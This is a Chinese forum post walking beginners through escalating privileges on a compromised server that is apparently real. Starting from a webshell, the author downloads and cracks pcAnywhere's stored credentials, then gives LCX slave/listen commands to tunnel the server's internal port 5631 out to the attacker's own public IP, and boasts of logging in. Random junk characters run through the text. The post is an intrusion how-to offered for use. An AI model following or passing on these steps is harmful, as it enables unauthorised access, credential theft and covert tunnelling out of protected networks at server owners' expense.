  
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
7 @" y: ?: B: @
- S# [0 @# y0 y6 k& n提权方法:pcanywhere+LCX
0 ~3 `# J ^3 t9 k1 ?' {9 L G5 X) g# E& M; v) |+ ?* Q
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
+ N2 a5 Y" [+ ?0 q& y* S
1 q6 n7 e' c5 l9 m在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。+ I. Q. P* e) z$ ~ t2 Q
& i. b* u3 Y' [+ l9 e
/ N0 X6 K% a* Q) U! F查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。; n2 J" N/ K% G$ q
( W+ P3 I. [5 d) H, ^" f# e7 f
! Q# ~0 \7 X* Y1 C( d呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。3 V8 x3 L$ S. ?" c- o
9 n' U4 P/ Z+ M- Y6 a: p1 L/ z
( G6 w) u L! R6 R% J5 A/ x7 z2 c! |- k( A9 \8 L/ i& O6 z
, k' m& T* |: \' z
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
! T( t3 E7 b+ [. g
; k% r8 r* k" R( F5 b# m+ h6 F9 ?0 g" ~4 }+ V( L( |5 u, d8 N
LCX的用法再简单说下:: o( `8 P3 g. Q
0 n- F6 g2 A- n) ?: g8 m1 ^服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)6 C1 }8 F# b0 H1 O1 p7 n7 e9 ^
1 W+ [, i% @0 A4 \ d
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)" k6 h& _% {2 y6 e. `( C
, Z% u, S$ Y2 Y由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
2 d; q: z! u" D; F顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
: e* [6 Y/ m/ v4 U* `* X/ s% B4 Z6 \& S) x
. o$ [$ u$ y: j. i/ h8 A
9 z h4 D, w; r# _. a
& `* b7 p: H& K; C$ D0 j* S呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。% ^0 \- o. F4 i4 \1 f" Y
8 L7 o0 s5 D; p4 X% V, n! d6 E* p! A6 s
6 o* e5 ?% m; f6 u
. y: ?; W1 o6 n, c4 Z9 T我们本地连接试试,输入我们刚破解的账号密码2 n) B% d j3 K7 E: l
2 r F8 T$ P' l6 h& j
) \& u7 [( s+ x/ F呵呵``连接成功,服务器不错,又一个8核^︵^
7 m- H: q* X% t N1 f
p. L: t1 p+ t) n4 z7 }3 [8 i* v' L0 Q9 m5 |) Z/ T# z
, x8 v3 I" U; W( e" u |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|